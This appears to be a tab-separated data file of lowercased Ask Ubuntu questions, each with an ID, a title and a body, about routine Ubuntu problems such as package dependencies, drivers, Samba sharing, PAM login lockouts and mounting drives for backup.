338543	install libopencv-dev 32bit on 12.04 64bit	i 've already installed the 64bit version of the package libopencv-dev and want now to install the 32bit version . i tried the command : sudo apt-get install libopencv-dev : i386 but got the following error message the following packages have unmet dependencies : libopencv-dev : i386 : depends : libopencv-core-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-ml-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-imgproc-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-video-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-objdetect-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-gpu-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-highgui-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-calib3d-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-flann-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-features2d-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-legacy-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed depends : libopencv-contrib-dev : i386 ( = 2.3.1-7 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . is there a conflict with the 64bit version ?
338544	windows can not write to subdirectories of home directory shared with samba	i 'm sharing my homes directories in a vmware ubuntu guest to a windows 7 host . i can write to the /home/user directory with no problem but when i drill down into sub-directories , windows tells me i do not have permission to perform this action . here are the settings i changed : [ homes ] comment = home directories browseable = yes writable = yes create mask = 0777 directory mask = 0777 guest ok = yes valid users = % s i 'm not yet proficient with linux so i apologize if i 'm missing something obvious .
338547	after downloading ubuntu can i revert back to windows 8 ?	i am thinking of trying out ubuntu and if i do n't care for it , can i easily revert back to windows 8 or can it be run side by side with windows 8 ?
338548	why does n't bash completion for 'cc ' and 'c++ ' work ?	while trying to compile using a c/c++ file using cc/c++ commands , i find that it is no longer possible for me to use tab key for bash-completion . i could do the same before 12.10 . also , when compiling with gcc and g++ , bash-completion works fine .
338552	all my libreoffice macros are gone . how to recover them ?	i had about 10 saved macros . they appeared under libreoffice basic > my macros > standard > module 1 . today , they 're all gone . i do n't have the slightest idea of how to go about trying to recover them . any clues ?
338556	will dual monitor work with two different connector types ?	i am looking at two monitors of the exact same type . i have an amd a4 which includes a 6410d radeon chip with the latest proprietary drivers installed . on my motherboard i have one dvi output and one vga output . will a dual monitor setup work if i plug one into the dvi port and one into the vga port ? will there be a difference in quality , or is there anything else i will need to keep in mind ?
338561	software updater failed to download repositories 13.04	my software updater is no longer working . the computer tells me i need to check from updates , it shows a red triangle symbol that if you click it give me an option to show updates but when i do the software updater either does n't open or takes an extrodinary long time to do so . when i finally do get it open it either says that the software is update or checks for updates and fails to download repositories . i 'm not very knowledgeable about linux or ubuntu yet so if i could get some help that would be great . these are the last few lines of what the terminal outputed : w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/deluge-team/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
338563	ubuntu 13.04 laptop ( lenovo ) wo n't turn off !	when i try to shut down ubuntu , it does so , but immediately the machine turns on again . i have to boot into the bios screen ( just to be safe to avoid hd errors ) and hold the power button to shut the computer down . how do i fix this ?
338568	how to prevent bumblebee on a dell e6530 disable optimus on the next boot ?	i 've got a dell latitude e6530 here which is nvidia optimus enabled . in ubuntu 12.04 i installed : nvidia-319 bumblebee stable ppa version 3.2.1-1~preciseppa4 installed with the instruction from https : //wiki.ubuntu.com/bumblebee raring hardware enablement kernel+xorg ( by default on 12.04.3 new install ) works perfectly fine for one boot after installation . each boot following the first will result in a black screen . i 've nailed it down to a resetting option in the bios of the dell machine : after installing bumblebee and booting for the first time with it , it will disable it in the bios . the option `` enable optimus '' is unticked , magically . this means i have to re-enable optimus in the bios before i boot ubuntu every single time . running an os without bumblebee does not reset the optimus setting in the bios . how can i prevent bumblebee from touching the settings in the bios ?
338575	wifi broadcom does not work	i know there are a lot of posts like this one , but i have not succeeded yet ! i just installed 12.04 . at the beginning , the network manager was not showing the wireless networks . the output of lspci -vvnn | grep 14e4 is the following : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) after reading some posts in this forum , i did this : removed `` bcmwl-kernel-source '' using synaptic package manager ; installed `` firmware-b43-installer '' and `` b43-fwcutter '' again by synaptic package manager . now , i am able to see all available wireless networks , but it never connects successfully . the wireless icon stays blinking for awhile before saying `` wireless network - disconnected '' . also , i never could do the thing with `` additional drivers '' . i always get an error . this is the log : fatal : module wl not found . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-29-generic 2013-08-28 21:50:55,489 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-08-28 21:50:55,490 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-08-28 21:50:55,532 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-28 21:51:20,917 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-28 21:51:20,942 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-08-28 21:51:20,974 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted i do n't know anymore if i am supposed to install the module wl or not . thank you for your thoughts .
338578	unity 3d and proprietary drivers	i have come across an interesting problem . i 've got an asus k55vd with an nvidia 610m graphics card . i did a clean install of 12.04 off a live cd . during my first use , i chose to install the proprietary drivers . during the same session i did a complete update of my system , some 650 updates in total . when i did all the restarting , my default session has seemed to change to unity 2d . when i run echo $ desktop_session , i get ubuntu-2d . this happens even when i start the session by choosing 3d . it 's not a super huge deal , but i 'd like to be able to run in 3d . it wo n't let me change the size of the launcher , and i 'm really annoyed at having the buttons so large . i have tried to get rid of the proprietary drivers , but my computer says now that it 's not using any . any advice ? thanks !
338579	trim and encrypted home folders	i have enabled trim for my root partition by adding discard in /etc/fstab , following how to enable trim ? they mention that special steps are needed if i have an encrypted partition . i have encrypted folders , but not encrypted partitions . do encrypted home folders need special steps to enable trim ?
338586	how do i reload images in an email ?	if i accidentally click `` show remote content '' on an unread email while not connected to the internet , images in the message fail to load ... but that button also disappears . how can i reload them later ? i have n't found an option for that .
338587	what is the difference between good_sites and trusted_sites ?	the squid.conf file contains two lists of allowable domains , but i do n't fully understand the difference between the two lists , one is called good_sites and the other is called trusted sites , below is the portion of the squid.conf that i am referring to : acl good_sites dstdomain `` /etc/squid3/good_sites '' http_access allow good_sites acl trusted_sites dstdomain `` /etc/squid3/trusted_sites '' http_reply_access allow trusted_sites any ideas ?
338588	limit user login attempts ( ubuntu 12.10 , pam_tally.so , pam_tally2.so )	first , i am a relative linux newbie , so bear with me . much of the advice i have found on the web for limiting login attempts does not pertain to quantal . all of it does specify using pam_tally.so or pam_tally2.so , which seem to be the fundamental linux mechanisms for user authentication . unfortunately , it also appears that various distros ( rhel , ubuntu , cent , etc . ) have slight variations for configuration requirements . in 12.10 , after enabling pam_tally.so , the main problems i have encountered are related to incorrect tally incrementing : increments 2 times for every login failure increments all other users when a user fails increments all other when a user switches accounts and other variations of this behavior . however , it does lock accounts that exceed the limit , as required , and resets the counter to 0 after a successful login . pam_tally2.so eliminates some of the errors , such as incrementing all other users when a different user fails , but still increments the user 2 times for every failure . here is what my /etc/pam.d/common-auth looks like : auth required pam_tally2.so file=/var/log/tallylog deny=3 auth [ success=1 default=ignore ] pam_unix.so account required pam_tally2.so auth requisite pam_deny.so auth required pam_permit.so auth optional pam_cap.so if i duplicate the instructions on manpages for pam_tally2.so , i am locked out of the machine and have to undo the changes via root from a livecd boot . my questions are : is pam_tally.so now fully deprecated in favor of pam_tally2.so ? does anyone have a working common-auth file they can post , which works exactly as advertised , for 12.10 ? any other suggestions are welcome as well . does 13.04 use a different mechanism than pam_tally to manage login counts & lockouts ? if 13.04 does limit logins correctly , with less hassle than 12.10 , i would probably migrate to it since limiting login attempts is a necessary feature for this machine . if login attempts can not be limited in some version of ubuntu , i will likely have to use another distro , like centos .
338590	i ca n't start ubuntu	i ca n't start ubuntu , which is weird because i have it for months already and there was no problem , but now i select it from the bootscreen and it shows an ubuntu screen , then turns black and stays there . please help ! ! i have windows 8 and i installed ubuntu 12.04 along with it , and so far i had no problems .
338591	python tkinter packages	i 'm having some difficulty finding information on which packages i need to use tkinter . the software centre shows idle ... i do n't think it 's the same thing . synaptic package manager lists numerous `` tk '' packages - which do i need ? i tried removing and reinstalling : sudo apt-get install tk8.5 could there be a miss-match with my python version 2.7.4 ? nick
338594	wireless driver will not install	i downlaoaded unbuntu to a partition on my hdd , and when i run it , i need to install the wireless driver to connect to the internet , but it will not install.yet when i run unbuntu from my disk drive ( dvd ? ) the same driver installs flawlessly . i ca n't access the web to fix it , so i am thinking of deleting it .
338598	how to set-up linksys e4200 router on ubuntu 13.04 ?	how do i set up my router ( linksys e4200 ) ? i have the software that came with it but it is for windows . my computer has internet access but when i click on internet connection information i get error : no valid active connections found . i want to set-up the computer to be a server and i need the private ip address from my pc .
338599	error during installation openldap on ubuntu	please help me to find out why its not working root @ icloud_mail # sudo apt-get install slapd ldap-utils reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libodbc1 libslp1 suggested packages : libmyodbc odbc-postgresql tdsodbc unixodbc-bin slpd openslp-doc the following new packages will be installed : ldap-utils libodbc1 libslp1 slapd 0 upgraded , 4 newly installed , 0 to remove and 284 not upgraded . need to get 2,243 kb of archives . after this operation , 5,595 kb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ quantal/main libodbc1 i386 2.2.14p2-5ubuntu4 could not connect to 172.19.48.164:8080 ( 172.19.48.164 ) . - connect ( 110 : connection timed out ) err http : //us.archive.ubuntu.com/ubuntu/ quantal/main libslp1 i386 1.2.1-9 unable to connect to 172.19.48.164:8080 :
338600	i ca n't print pdf files	i am having difficulties printing pdf files using ubuntu 12.04 . i can print .odt ( word files ) without problems , but pdf files keep stuck on processing and does nothing . i am using a canon mg 5350 . i already tested this on multiple computers ( all ubuntu 12.04 ) and the problem did n't go away . what can i do to resolve this problem ? edit : i have tried printing trough evince and okular , but i have n't tried another printer ( i only have one ) . printing pdf files on windows does work , so i think the problem lies within ubuntu
338601	cif single chip webcam settings	i have a webcam connected to my laptop , ubuntu raring ringtail , i ca n't get a way to set my camera it only shows bright light . i have already tried a number of apps that use the camera to adjust it but to no avail . any ideas ?
338606	unable to run svn commands on a repository version 1.7	i 'm unable to run svn commands in an existing repository . running svn status results in this : gene @ gene-thinkpad-t60p : ~/dropbox/cds $ svn status svn : the path ' . ' appears to be part of a subversion 1.7 or greater working copy . please upgrade your subversion client to use this working copy . after some googling i thought that the right thing to do would be to run svn upgrade , ( but this was a red herring , upgrade does n't upgrade your installation of svn , it upgrades the version implicit in the project ) . in any event , upgrade is not available in version 1.6 gene @ gene-thinkpad-t60p : ~/dropbox/cds $ svn upgrade unknown command : 'upgrade ' type 'svn help ' for usage . i tried to update of subversion ( aka svn at the command lines ) i tried sudo apt-get update then sudo apt-get upgrade , with no effect . i also tried sudo apt-get install subversion , with no effect . i downloaded the source code and tried building subversion , but i got this error after running ./configure ... truncated ... /bin/grep -e checking whether ln -s works ... yes checking for a bsd-compatible install ... /usr/bin/install -c configure : apache portable runtime ( apr ) library configuration checking for apr ... no configure : warning : apr not found the apache portable runtime ( apr ) library can not be found . please install apr on this system and configure subversion with the appropriate -- with-apr option . you probably need to do something similar with the apache portable runtime utility ( aprutil ) library and then configure subversion with both the -- with-apr and -- with-apr-util options . configure : error : no suitable apr found i had already read a few pages about the apr utility in the readme for svn , but it seemed very involved . maybe aprutil is for installing the server version of svn rather than the client ? this command sudo apt-get install libapache2-svn says that i 'm already at the most current version . ( edit : ) when i try sudo apt-get install subversion it says that i 'm at the newest version reading package lists ... done building dependency tree reading state information ... done subversion is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . but , my current version ( based on svn -- version ) is svn , version 1.6.17 ( r1128011 ) compiled jun 26 2013 , 20:44:02 . this seems recent to me , but according to the website they 're already on 1.8 . thanks in advance for any help .
338609	ubuntu 12.04 touch-pad and keyboard problems asus q500a	i am using an asus q500a with ubuntu 12.04 unity ; linux kernel 3.5.0.39 with windows 8 dual boot . i will note that all of my hardware works flawlessly in windows 8 which came with the computer , i just do n't like windows . i am running a dual boot with windows on ntfs and ubuntu on ext4 . windows on uefi.efi . when i boot to ubuntu the first time i press the h key it does n't work , but it works fine after that . this problem is consistent . sometimes certain on-board shortcuts on my keyboard will auto-press a key instead of performing their intended function . for example , fn+f12 is supposed to increase my volume . sometimes it presses q repeatedly instead . same problem with brightness controls for screen and keyboard ( but other keys besides q like h ) . logging out and logging back in fixes the problem temporarily . tried kernels 3.5.0.36-39 as well as 3.9.11 and it does n't seem to make much difference . also tried gnome-panel and xubuntu-desktop . not much difference except xubuntu seems to have slightly different issues with my hardware . the most annoying problem is sometimes ( usually when opening or closing an app ) my mouse will get stuck on grab mode . when this happens i can not click , it just wants to grab windows and drag them around . when this happens i can not click shutdown , or log off . space and enter do not seem to work either . most of the functionality of my keyboard fails when this happens . i am able to open terminal with ctrl+alt+t but when i try to type anything it starts opening tabs on top of the screen such as `` file '' or `` edit '' . the only thing i have found to work is ctrl+alt+del to log out , then waiting 60 seconds for it to do so automatically . logging out temporarily fixes the problem . i have tried switching to gnome-panel and xubuntu-desktop , as well as the previously mentioned kernels with little difference . edit i have now tried ubuntu 12.10desktop , and xubuntu 13.04 and experienced the same problems . sudo uname -a : linux seth-q500a 3.5.0-41-generic # 64~precise1-ubuntu smp thu sep 12 16:50:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo lsb_release -a : lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise
338613	ubuntu 13.04 does n't see my 2tb hard drive	i have a small problem . i switched today from windows 7 to ubuntu 13.04 on my home pc . i have installed 3 hard drives - 250gb , 500gb and a 2tb . on the 250gb i have installed the system - clean installation , formatted it . to make sure i do n't screw with my other data i disconnected other drives ( and switched places ) . now , after installation when i boot to ubuntu the system finds the 500gb drive and i can access all the data , but the 2tb drive is not present . in the `` disks '' that drive is marked as empty . but when i booted the activeboot to check it - all the data is fine and i can access it . any ideas how can i access that 2tb from system level ? it holds lots of important data and i do n't have enough space to backup it and format it again ... edit ( sorry for polish language , but i 'm just used to localized system ) : sudo fdisk -lu [ sudo ] password for marcin : disk /dev/sda : 250.1 gb , 250059350016 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 30401 , w sumie sektorów : 488397168 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 512 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 512 / 512 identyfikator dysku : 0x0004c4b4 urządzenie rozruch początek koniec bloków id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 488396799 243947521 5 rozszerzona /dev/sda5 501760 488396799 243947520 83 linux disk /dev/sdb : 500.1 gb , 500107862016 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 60801 , w sumie sektorów : 976773168 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 512 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 512 / 512 identyfikator dysku : 0x3c51041e urządzenie rozruch początek koniec bloków id system /dev/sdb1 2048 976771071 488384512 7 hpfs/ntfs/exfat uwaga : na '/dev/sdc ' wykryto tablicę partycji gpt ( guid partition table ) ! fdisk nie obsługuje gpt . należy użyć gnu parteda . disk /dev/sdc : 2000.4 gb , 2000394706432 bytes głowic : 256 , sektorów/ścieżkę : 63 , cylindrów : 242250 , w sumie sektorów : 3907020911 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 4096 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 4096 / 4096 identyfikator dysku : 0x00000000 urządzenie rozruch początek koniec bloków id system /dev/sdc1 1 4294967295 2147483647+ ee gpt partycja 1 nie zaczyna się na granicy bloku fizycznego . disk /dev/mapper/sda5_crypt : 249.8 gb , 249800163328 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 30369 , w sumie sektorów : 487890944 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 512 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 512 / 512 identyfikator dysku : 0x00000000 dysk /dev/mapper/sda5_crypt nie zawiera poprawnej tablicy partycji disk /dev/mapper/ubuntu -- gnome -- vg-root : 232.6 gb , 232616099840 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 28280 , w sumie sektorów : 454328320 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 512 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 512 / 512 identyfikator dysku : 0x00000000 dysk /dev/mapper/ubuntu -- gnome -- vg-root nie zawiera poprawnej tablicy partycji disk /dev/mapper/ubuntu -- gnome -- vg-swap_1 : 17.2 gb , 17179869184 bytes głowic : 255 , sektorów/ścieżkę : 63 , cylindrów : 2088 , w sumie sektorów : 33554432 jednostka = sektorów , czyli 1 * 512 = 512 bajtów rozmiar sektora ( logiczny/fizyczny ) w bajtach : 512 / 512 rozmiar we/wy ( minimalny/optymalny ) w bajtach : 512 / 512 identyfikator dysku : 0x00000000 dysk /dev/mapper/ubuntu -- gnome -- vg-swap_1 nie zawiera poprawnej tablicy partycji
338614	ubuntu 12.04 32bit system fails memory testing	results : '' failed meminfo total : 3097452 kb dmi total : 4096000 kb accuracy : 75.00 memory totals not close enough '' i recently had some more ram installed : i had 1gb . i added 2gb , giving a total of 3gb . as far as i can tell , it is working ok. for example , i use system-load-indicator and it shows credible amounts of memory used . i have run system testing a few times since having the additional ram installed , and it has shown failed each time . `` meminfo total : 3097452 kb '' is exactly what i would expect . `` dmi total : 4096000 kb '' does n't make any sense to me . there are at least 3 plausible meanings of dmi on acronymfinder.com . `` accuracy : 75.00 memory totals not close enough '' does n't make any sense to me either . not close enough to what ? i can see that meminfo/dmi total =0.756213867 =75.6213867 % which is kind of about 75.00 % . is this where `` 75.00 % '' comes from ? what do all these numbers ( above ) mean ? in my case , what does failed mean ? if applicable , any suggestions about how not to get a failed result ? i suppose at the moment i need to see if the ram needs to be reseated or something .
338620	ca n't uninstall old kernel	i ca n't install a new kernel because by boot partition is full . however i also ca n't remove an old kernel : sudo apt-get purge -f linux-image-3.2.0-29-generic-pae [ .. reading package lists etc , standard stuff , not relevant & was too lazy to translate it ] the following packages have unmet dependencies : linux-image-generic-pae : depends on : linux-image-3.2.0-41-generic-pae but shall not be installed e : unmet dependencies . try âťapt-get -f installâť without giving a package name ( or give a solution ) . any idea how i can fix this ? thanks : - ) ( note : apt-get -f install also fails : not enough free space ! )
338625	i have windows 8 and windows 7 can i install ubuntu to a usb normally	help me please i so confused with this install ! ! i have 2 os and want to have 3 but ubuntu on a usb ? i have windows 7 windows 8 and want to install ubuntu to a usb please help ?
338631	installing 13.04 ( x64 ) off of usb ( and via windows installer ) onto ssd but stuck at loading screen	i am trying to install ubuntu to alleviate some windows issues i 've been having . i 've run checkdisk so i know my disk has n't gone bad . ( or at least it had n't found anything ... ) i 'm trying to install onto a solid-state hard drive . i tried booting off of the usb drive : i get a purple background with ubuntu in the middle and 5 dots , that cycle from white to reddish . it sticks after a bit and never comes unstuck . i ran the usb utility to check the files on it . it says there are no errors . i ran the windows installer in windows and it appeared to work fine . oddly , the installer downloaded an iso when i could have sworn that 's what i put on the thumbdrive in the first place ... it got to a point where it says i need to restart the computer to finish installing . i restart , and the same splash screen ( ? ) comes up and freezes at the same point . 20 minutes of letting it just sit and nothing . of note is that this usb install works fine on my laptop . what can i do to get around this issue ?
338635	problems setting up ubuntu vm on windows host . cant set static ip	trying to set up a ubuntu vm on a windows host using a bridged network connection and im unable to assign a static ip to the ubuntu vm . the routing table shows 2 sets of entires and i cant reach any devices on the inernal network from the vm . all the internal devices are on the same subnet but i can reach the outside internet i run ifconfig and the address of the adapter is correct 10.141.98.200 but i ca n't reach the device there . when i go ip route show i can see a routing table for another ip 10.218.84.xxx ( varies on startup ) ... that i can reach the device at so it seems to accquire an ip through dhcp . i guess the bridged network adapter accquires this ip ?
338644	copying desktop installed ubuntu to usb drive with all settings and programs	i have installed ubuntu on my laptop/desktop . as a root user , i created 17 other accounts with their own permissions . for example other 17 accounts can not access to internet , they can not download or upload anything from usb drives , they all have different username/passwords and also installed my program as a jar file along with some other proprietary documents onto their home folder . basically i created their account so that they can only access to my jar file and documents nothing else when booted from usb drive . now i want to give all those 17 people usb flash drives with the copy of my ubuntu system so that they can each access their own jar files from those usb bootstartup . how should i make copies of my current ubuntu system to usb drives so that i can distribute those jump drives to those 17 peoples .
338646	removing files that do n't end with -out	how would i delete all files in a directory and its subdirectories that do not end with -out ? for instance delete foo.bar but do not delete foo-out.bar . edit : i have tried for a_file in $ ( find . ! -name '*-out* ' ) ; do rm $ a_file ; done ; but this script does n't incorporate spaces . how would i fix that ?
338653	how to make external usb harddrive mount properly for backup script with udisks2	i 'm running kubuntu 12.04 with kde 4.11.1 . i have a 2tb hard drive mounted in an external usb enclosure . the drive label is backup . the drive is not automatically mounted when i boot . there are two ways i wish to mount it : i have a root cron entry that will mount the drive if it is not already mounted . this is part of my nightly backup script . as a normal user , i can click the drive label in dolphin 's places panel and the drive will be mounted . previously , the drive would mount at /media/backup in both cases . i manually created the directory /media/backup previously and it still exists . the directory is required so that my backup script can mount this disk before the backup runs . as i said , this was working as intended before some recent system updates . i want the drive to mount at the same location in both the situations above . however , with recent system updates ( apparently the lts raring hwe stack ) the drive mounts at /media/myusername/backup from dolphin if i mount it from dolphin as a normal user . it mounts as /media/root/backup if i mount it as root user . there are a variety of ways this new ubuntu scheme can fail under my scenario . in fact , it is rountinely failing and my nightly backups are not happening anymore . i wo n't list all the ways i have seen it fail in my troubleshooting so far . i would simply like to restore the previous behavior for this disk or achieve something that works reliably under the new system . specifically , what i would like to see is : the drive is n't mounted at boot and is n't mounted unless/until needed . whether mounted by my normal user via dolphin or via a script run as root , the drive is always mounted at the same place ( so my backup script can find it ) . if the drive has n't been mounted yet ( i.e. , via dolphin ) , my backup script ( run as root ) is able to mount it at the intended location and then proceed with the backup . file permissions on files and directories on the mounted drive work as expected here 's all i needed in my root crontab previously . i 'd like to get this working again . 00 03 * * * mount -l backup /media/backup > > /var/log/backup.log 05 03 * * * /opt/storebackup/bin/storebackup.pl -f /configfile i prefer not to change my system-wide default behavior . therefore , this solution does n't seem ideal : http : //askubuntu.com/a/276670/36661 ( and i do n't yet know if i have the udisk version that would support that solution ) . i would appreciate comments on this possible solution : http : //askubuntu.com/a/350399/36661
338656	installing glib gives `` you must have either have gettext support ''	i 'm trying to install glib-2.37.6 ( also same problem with glib-2.32.1 ) and getting this error during configuration : you must have either have gettext support in your c library , or use the gnu gettext library . ( http : //www.gnu.org/software/gettext/gettext.html i previously built gettext , though . to clarify , i 'm trying to build a number of things ( leading up to gtk+ ) without actually installing in the usual places , since this is a machine others use ; instead , i 'm using -- prefix= to put everything in a work directory under my home directory . i tried looking at the logs to see if i could get a clue about whether i needed to set anything else . i also tried looking at the configure script , although i 'm not an expert on autoconf . what i found was that the error occurred because gt_cv_have_gettext was n't set to yes . so then i looked for where it was supposed to get set , so that i could tell what file or whatever it was checking for . but unless i 'm missing something , the only command that would set it to yes is underneath this if : if test `` $ gt_cv_func_dgettext_libc '' ! = `` yes '' \ || test `` $ gt_cv_func_ngettext_libc '' ! = `` yes '' \ || test `` $ ac_cv_func_bind_textdomain_codeset '' ! = `` yes '' ; then the config.log ( looking at the configure line numbers ) indicates that the condition was false , so everything inside ( including the command to set gt_cv_have_gettext ) was skipped . but the test seems to check that none of three things are missing . and none of them are ; here 's one of the last segments of config.log right before the error : configure:7982 : checking for ngettext in libc configure:8000 : gcc -o conftest -g -o2 conftest.c > & 5 configure:8000 : $ ? = 0 configure:8009 : result : yes configure:8013 : checking for dgettext in libc configure:8031 : gcc -o conftest -g -o2 conftest.c > & 5 configure:8031 : $ ? = 0 configure:8040 : result : yes configure:8047 : checking for bind_textdomain_codeset configure:8047 : gcc -o conftest -g -o2 conftest.c > & 5 configure:8047 : $ ? = 0 configure:8047 : result : yes configure:8323 : checking for msgfmt ( the line that would set gt_cv_have_gettext is somewhere between 8047 and 8323 . ) so unless i 'm missing something , it looks as though if all these three things -- ngettext , dgettext , bind_textdomain_codeset -- are present ( or succeed , or something ) , then an error will result . so what am i missing ? is there some other option that needs to be set , or something else wrong with my configuration ? or did i find an error in the configure script ? thanks for any help . i wanted to ask in a forum like this before submitting it as a bug report .
338657	virtualization unbuntu guest	i want to install ubuntu on my laptop ( i7 ivy bridge 32gb mem ) and run a one or two ubuntu guests . is there a step by step guide to help me do this ?
338658	i ca n't format disk in usb floppy drive	i need to low-level format floppies with an external usb floppy drive in ubuntu 10.04 ( or later ) server . i have tried the tools that come with util-linux-ng , and contain ( specifically ) fdformat . unfortunately these tools are written to use /dev/fd* devices , and not /dev/sd* that is used with the usb floppy drives i have on hand . alternatives to using the tools would be appreciated ( note , the computers i have at my disposal do not have floppy connectors on the main board , so please do n't recommend using a `` real '' floppy drive ) . for example , i know dd works to zero the drive , but i suspect i need a copy of a working , blank formatted floppy as the if= parameter . i have my doubts this would be a robust , ongoing solution for actually writing out the tracks on the floppy . the answers are not at : how can i get a usb floppy drive to work ? how to format a usb or external drive ? ... and lots of others
338659	how to recover apt-get that was deleted by me ?	i was deleting wine package and somehow apt-get was deleted along wine . now if i try to use apt-get i see message that apt-get is n't installed/exists . i already install aptitude , but when i use it i have error says that i have n't driver for /usr/lib/apt/methods/https so here 's the question : how can i install apt-get back ?
338660	can i run kde-based programs without completely installing kde ?	i want to be able to use some programs that depend on kde , such as krita and kdenlive , but i do n't want to have to install the kdm . if i install krita on ubuntu , i suffer many problems trying to open it . looking at the terminal output , it seems they are related to some missing kde folders or something like that . is it possible to install the kde directories hierarchy without need to install the entire kde plasma desktop ?
338661	ubuntu studio 12.04 , will not boot	i have an older laptop on which i have been running the current version ( i think ) of ubuntu for a few months . i now would like to install ubuntu studio , so i made a bootable usb for it . when i shut down my computer and turned it back on , it booted like normal , not even noticing the bootable usb plugged in . i 'm fairly certain the usb should work , since it appears on my desktop , and the usb has all the right stuff on it . how can i boot from my liveusb ? additional info : my computer is a compaq presario cq60 , with nvidia graphics and sempron amd ( which i believe is a soundcard ) . it originally ran windows vista .
338668	how much does ubuntu cost ?	i really like ubuntu desktop . my company has some computers . i 'm thinking on install ubuntu on our computers . so , i need to know how much the operative system cost ? if not , how much is the cost for future system maintenance ?
338677	drivers are not detected on ubuntu 13.04	my memory card reader and bluetooth do not work on ubuntu 13.04 . is there any solution ? lsusb output is this : bus 005 device 002 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) lspci output is this : 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd device 0c32 ( rev 05 ) 03:01.1 smbus : ricoh co ltd device 0c22 ( rev 22 ) 03:01.2 serial bus controller [ 0c80 ] : ricoh co ltd device 0c43 ( rev 12 ) 03:01.3 serial bus controller [ 0c80 ] : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 03:01.4 serial bus controller [ 0c80 ] : ricoh co ltd device 0c52 ( rev 12 ) i hope we can resolve and fix this .
338678	ca n't get gui to start from command prompt	i 've been running ubuntu for some time . last night i installed the updates that automatically download periodically and shut down . this morning the machine will only boot to the command prompt . i 've tried all the `` fixes '' i can find on-line without success . the startx command brings up a message `` api mismatch : the nvidia kernel module has version 304.88 but this nvidia driver component has version 173.14.35. '' .. how do i make sure both are the same ? what else can i do to get this machine to boot the gui again ?
338698	alternatives to moonlite in ubuntu ?	is there any other equivalent to moonlite of ubuntu for silver light in windows ?
338703	how to install different fonts in ubuntu ?	is there any application which can let me browse different font styles and install what i have liked from internet ?
338706	12.04 to 13.04 goes black . why ?	i have an hp g60-445dx notebook pc running ubuntu 12.04 . how can i check to see if i can upgrade to 13.04 ? i tried to install it once before and my screen stayed black so i reinstalled 12.04 ? new to linux/ubuntu ! does it have anything to do with the 32/64 thing and what is that ?
338707	is there anybody using 2x client ?	i need to use the app : 2x client for work . i can get it to work , make connection to the server and work with it but as soon as i open the terminal screen it goes full screen and the only thing i can do is log out to get back to my desktop ! there 's no other way for me at this point . i come from a windows environment and there 's a so called connection-bar on top of the screen where i can minimize/window the terminal screen so i can work with the ubuntu desktop . this bar is missing with my . does anybody have a solution for this ?
338710	where can i download ubuntu 13.04 dvd image ( not cd image )	i want to install 64-bit ubuntu 13.04 , but can not find a dvd image . i do n't want a cd image , because it will be missing things i want ( always happens ) . but i can not find such an image , except ubuntustudio , which has some completely different window manager that i do n't recognize . i have searched and looked for 2 hours already . so where did they hide it ?
